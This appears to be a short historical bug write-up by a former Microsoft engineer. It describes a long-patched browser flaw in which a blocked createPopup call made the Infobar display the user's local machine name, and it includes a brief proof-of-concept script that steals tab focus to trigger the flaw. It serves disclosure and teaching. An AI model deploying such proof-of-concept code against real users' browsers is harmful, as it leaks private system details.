When a createPopup call was blocked because the tab did not have focus, the Infobar that appeared to notify the user showed the local machine name instead of the URL of the page that triggered the popup. This was a minor information disclosure — a remote page could cause the user’s machine name to appear in the browser UI.

<script>
function main()
{
    var dummyWindow = window.open(); // Opens a new tab, stealing focus from this one.

    try
    {
        createPopup().show(0,0,1,1); // Gets blocked, but the Infobar shows the machine name.
    }
    catch(e){}

    dummyWindow.close();
}
</script>
<input type="button" onclick="main()" value="ShowMe my localName">

The issue was limited because there was no obvious way to read the Infobar’s text content from script — the machine name was only visible to the user looking at the browser window.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.